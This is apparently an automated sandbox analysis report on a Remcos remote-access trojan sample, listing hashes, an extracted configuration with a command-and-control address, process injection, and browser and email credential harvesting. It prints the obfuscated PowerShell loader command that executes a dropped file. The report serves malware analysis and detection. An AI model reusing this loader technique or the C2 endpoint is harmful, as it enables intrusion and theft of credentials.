remcos | 4f3e62070efc1e0e7c3e9c66510f14c200bf45faff24d80a22a4b41ae97c9d68

General

Target

ikpo.exe
Size

787KB
MD5

6c984dd6faad761de792293a9cd30c1e
SHA1

bc17076ca2251c31ae3b0cccc2030de0fa6dcd74
SHA256

a59da8c3da0e8aa6621ef7aeb786958ea98691060e741ac5abcb328d37f6e947
SHA512

05ea3f148d5b172d6dda8ace37f557a53b18deeed983e65b7c927e45c9edc5b9fe7b7def6761a0a167655f90e165ca0cbf0024833b2f107cd578e6c520ed4f54
SSDEEP

12288:DDGTAY8L9W1KOFxJUuuz9PhigvacmLzlUannZIVlUfND1uAbf43vGxIRK/dUbz:IAzRW1KMxJ6igTmKKnZIVlUPM3Un1Ubz

Score

10^/10

remcos remotehost collection execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

204.10.160.176:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-X42CIS
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1448-3182-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/580-3181-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/580-3181-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1708-3184-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1448-3182-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

ImagingDevices.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	ImagingDevices.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ImagingDevices.exe

pid process

1372 ImagingDevices.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Powershell.exeImagingDevices.exe

pid process

816 Powershell.exe
1372 ImagingDevices.exe

pid	process
1372	ImagingDevices.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

Powershell.exeImagingDevices.exe

description	pid	process	target process
PID 816 set thread context of 1372	816	Powershell.exe	ImagingDevices.exe
PID 1372 set thread context of 580	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 set thread context of 1448	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 set thread context of 1708	1372	ImagingDevices.exe	ImagingDevices.exe

Drops file in Program Files directory 2 IoCs

Processes:

ikpo.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Common Files\Priory\Nedbrsmngde123.ini	ikpo.exe
File opened for modification	C:\Program Files (x86)\Common Files\Misaddressing.Sta	ikpo.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

Powershell.exe

pid process

816 Powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

Powershell.exeImagingDevices.exe

pid	process
816	Powershell.exe
816	Powershell.exe
816	Powershell.exe
816	Powershell.exe
816	Powershell.exe
816	Powershell.exe
580	ImagingDevices.exe
580	ImagingDevices.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

Powershell.exeImagingDevices.exe

pid process

816 Powershell.exe
1372 ImagingDevices.exe
1372 ImagingDevices.exe
1372 ImagingDevices.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

Powershell.exeImagingDevices.exe

description pid process

Token: SeDebugPrivilege 816 Powershell.exe
Token: SeDebugPrivilege 1708 ImagingDevices.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

1372 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	816	Powershell.exe
Token: SeDebugPrivilege	1708	ImagingDevices.exe

pid	process
1372	ImagingDevices.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

ikpo.exePowershell.exeImagingDevices.exe

description	pid	process	target process
PID 2344 wrote to memory of 816	2344	ikpo.exe	Powershell.exe
PID 2344 wrote to memory of 816	2344	ikpo.exe	Powershell.exe
PID 2344 wrote to memory of 816	2344	ikpo.exe	Powershell.exe
PID 2344 wrote to memory of 816	2344	ikpo.exe	Powershell.exe
PID 816 wrote to memory of 2468	816	Powershell.exe	cmd.exe
PID 816 wrote to memory of 2468	816	Powershell.exe	cmd.exe
PID 816 wrote to memory of 2468	816	Powershell.exe	cmd.exe
PID 816 wrote to memory of 2468	816	Powershell.exe	cmd.exe
PID 816 wrote to memory of 1372	816	Powershell.exe	ImagingDevices.exe
PID 816 wrote to memory of 1372	816	Powershell.exe	ImagingDevices.exe
PID 816 wrote to memory of 1372	816	Powershell.exe	ImagingDevices.exe
PID 816 wrote to memory of 1372	816	Powershell.exe	ImagingDevices.exe
PID 816 wrote to memory of 1372	816	Powershell.exe	ImagingDevices.exe
PID 816 wrote to memory of 1372	816	Powershell.exe	ImagingDevices.exe
PID 1372 wrote to memory of 580	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 580	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 580	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 580	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 580	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1448	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1448	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1448	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1448	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1448	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1708	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1708	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1708	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1708	1372	ImagingDevices.exe	ImagingDevices.exe
PID 1372 wrote to memory of 1708	1372	ImagingDevices.exe	ImagingDevices.exe

C:\Users\Admin\AppData\Local\Temp\ikpo.exe
"C:\Users\Admin\AppData\Local\Temp\ikpo.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
  "Powershell.exe" -windowstyle minimized "$Dulles = Get-Content 'C:\Users\Admin\AppData\Local\Temp\Personalerabatterne\Servicegarantiers.Met' ; $Sherryens=$Dulles.SubString(71538,3);.$Sherryens($Dulles) "
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    3⤵
    PID:2468
- - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
    "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fckxc"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:580
  - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /stext "C:\Users\Admin\AppData\Local\Temp\peppdyyxd"
      4⤵
      Accesses Microsoft Outlook accounts
      PID:1448
  - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ayuaeqrzriee"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
124B

MD5
26c94b00d3be89231a6cccf3c198a6f3

SHA1
b79eb7c2d394810976bc0a4b512b7df2fc3b0dff

SHA256
734885857b85530b1afb8c94ca30ad633360d6d08dc126d747b4d358b3d73f79

SHA512
04ecf3583227f5a0198101c8d0b27c87352d37a2e951f6dbf14fa93881f957cb097f9d53a0fc54abd1725128b0898640259a7c1ed3bdd532845fc7dac41844fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Genkbsvrdis.ini

Filesize
40B

MD5
67f7fb5e22799f4047a15a3914f69c2d

SHA1
06dba7dcdd82dc1f93dcfade2b685ac8ea686825

SHA256
ab226586c4f054353e0649d4cc3ea8b1fd9c6cc30e6a2c86c79bda996e5cd70b

SHA512
43d9acf5082cca2b4f615ccc866f2b69b2b8d290b807f13334cd924a1191dd9dd872a279689a625869976511e2ecbc6bafedafa1b39aa5c8cf23ab2b2a2cf1b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Personalerabatterne\Servicegarantiers.Met

Filesize
69KB

MD5
2833201aa6f7fc20aa9bc6c30ada040c

SHA1
5c2248094eeef1dff5ee628b114bd16e06860abd

SHA256
a651d2d6b6ba530c879db1dc2ac0deedaf5bef5202c669523c9f3ea4c5fdf69d

SHA512
35cc2c08029c3a64481617a49ce0fe5e7100cedc0b63086e5beb9db40e766bba161fd314572a570aa7ff1842b9b9efd667b425ccf7643abbc74ff4b1aa009bb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Personalerabatterne\Warpages.Hig160

Filesize
437KB

MD5
aaa2b700c96ee2b1e605f5fb52aad4d2

SHA1
60618eaa508fc6549b656b2199c2fa27b723f3e4

SHA256
8d64e3ed19f8f6165f4778e602126a532a37c1f8e242ec859f024ea4d8479547

SHA512
c77c301258a2707d011c8114359b93c5f25a9d24975a8cf1e1bf9d24aabe6b315dc35465782ab37ecc4bd5e9506678dff81b6ac3b763f1b8bb530471c4c1cd99

Download Submit
C:\Users\Admin\AppData\Local\Temp\fckxc

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
memory/580-3175-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/580-3173-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/580-3174-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/580-3181-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/816-3160-0x0000000073F80000-0x000000007452B000-memory.dmp

Filesize
5.7MB

Download
memory/816-3161-0x0000000073F80000-0x000000007452B000-memory.dmp

Filesize
5.7MB

Download
memory/816-3165-0x00000000064B0000-0x0000000007187000-memory.dmp

Filesize
12.8MB

Download
memory/816-3166-0x0000000073F80000-0x000000007452B000-memory.dmp

Filesize
5.7MB

Download
memory/816-3162-0x0000000073F80000-0x000000007452B000-memory.dmp

Filesize
5.7MB

Download
memory/816-3159-0x0000000073F81000-0x0000000073F82000-memory.dmp

Filesize
4KB

Download
memory/1372-3199-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3208-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3226-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3223-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3220-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3217-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3214-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3211-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3192-0x0000000000660000-0x0000000000679000-memory.dmp

Filesize
100KB

Download
memory/1372-3195-0x0000000000660000-0x0000000000679000-memory.dmp

Filesize
100KB

Download
memory/1372-3196-0x0000000000660000-0x0000000000679000-memory.dmp

Filesize
100KB

Download
memory/1372-3191-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3168-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3167-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3202-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1372-3205-0x00000000006E0000-0x0000000001742000-memory.dmp

Filesize
16.4MB

Download
memory/1448-3176-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1448-3182-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1448-3180-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1448-3177-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1708-3183-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1708-3179-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1708-3184-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads